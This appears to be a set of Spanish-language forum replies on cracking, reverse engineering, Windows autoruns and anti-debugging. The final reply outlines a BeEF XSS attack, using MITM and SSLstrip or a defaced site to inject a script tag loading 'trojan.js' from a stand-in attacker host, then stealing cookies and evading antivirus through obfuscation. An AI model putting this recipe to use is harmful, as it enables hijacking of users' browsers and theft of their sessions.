- Verificar la existencia de esos PATH
- Si están verificar la existencia de sus archivos como AndroiManifest y apktool.jar


Es un poco de Inglés nada más, y si no sabes tienes a google translate.

Lo acabo de ver y no entiendo como los usuarios no se toman la molestia de dar las gracias, es una increíble recopilación, yo conocía tres métodos pero nada mejor tener todos los métodos en un solo post, sería ideal una chincheta o ponerlo en algún lugar de fácil recuerdo. Muchas gracias.

PD: Sería ideal especificar los permisos requeridos para cada autorranque, como por ejemplo HKLM requiere permisos de administrador a diferencia de HKCU.

Simplemente comienza con el que desees depurar, así de sencillo y isDebuggerPresent es una API de Windows si no sabes eso ni sueñes romper la seguridad de Themida, saludos.

Si y muy posible y bajo tu permiso. Kaspersky trabaja como comunidad, enviando los archivos sospechosos (muestras) a los laboratorios de Kaspersky, si mal no me equivoco es una funcionalidad preguntada al momento de instalar el AV. No recuerdo el nombre, pero en configuraciones está.

Para obtener el algoritmo de cifrado requieres de Ing. Inversa (depurar). EJ: Crear un programa que pida contraseña al arrancar:

String clave;
printf("Por favor introduzca una contraseña");
clave = input();
if(clave == "hola123"){
 main (){
 .....
 ...
 }
}else{
prinf("Acceso denegado");
}

como puedes ver el seudocódigo solicitará una contraseña y será verificada, generando bifurcaciones del flujo del programa. Si reversas el programa podrías localizar el string "hola123", ahora cifrados conocidos, requiere simplemente reversearlos para conocer su estructura a nivel de ensamblador.

te recomendaría el F.A.Q

PD: Para winrar, el algoritmo no sé como se constituye pero la clave es la encargada de descifrar. podría ser "contraseña" xor bytes del archivo.

Hola, bueno si desconoces el crifrado, es imposible descifrar los datos, es similar al proceso de generación de serial, sin el algoritmo de cifrado no podrás descifrar. Siguiendo con la similitud, aun en ambos casos el algoritmo de cifrado/generación de serial debe ser un cifrado simétrico para poder ser decifrado sin fuerza bruta. Si el código C es el cifrado, debes invertir las operaciones
Ej: si suma, debe restar, si multiplica, debe dividir (son simples ideas en este mundo siempre todo es variable)

El usuario solicita una opinión sobre reballing no alternativas a overflow

legal kara, fica confortable no foro, a gente se fala!

Eso no ayuda en nada, debes mostrar tus avances, posibles address de importancia, lenguaje de programación, funciones o métodos (de acuerdo al lenguaje) que podrían apuntar a una validación.

Si mal no me equivoco es un troyano en javascript, la idea es combinarlo con un MITM + SSLSTRIP + inyección de código + Beef XSS (especie de troyano en javascript) o de forma alternativa ser dueño de una web popular o desfacear una y agregar el javascript de Beef XSS, la idea es así:
- El usuario ingresa a una página
- A través de MITM + SSLSTRIP toda página aun HTTPS se agrega un código:
<script type=java/script src=http://hackerweb.com/trojan.js> (no recuerdo bien)
- Este troyano, detecta el navegador, sistema operativo, permite agregar un iframe, activar la webcam a través de adobeflash player, stealer cookie, etc.
Lo bueno es que al ser javascript la ofuscación es fácil de hacer lo cual facilitaría el bypass de AV, desconozco si se realiza un análisis heurístico a javascript